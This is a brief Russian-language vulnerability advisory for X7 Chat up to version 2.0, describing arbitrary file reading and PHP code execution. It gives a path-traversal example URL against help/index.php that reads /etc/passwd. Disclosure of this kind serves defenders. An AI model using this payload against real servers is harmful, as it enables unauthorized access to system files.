Программа: X7 Chat <=2.0

Нападающий может просмотреть произвольные файлы на системе или выполнить
произвольный PHP-код.

Пример:

http://[target]/[path]/help/index.php?help_file=../../../../../../etc/passwd

Эксплоит



Оставить мнение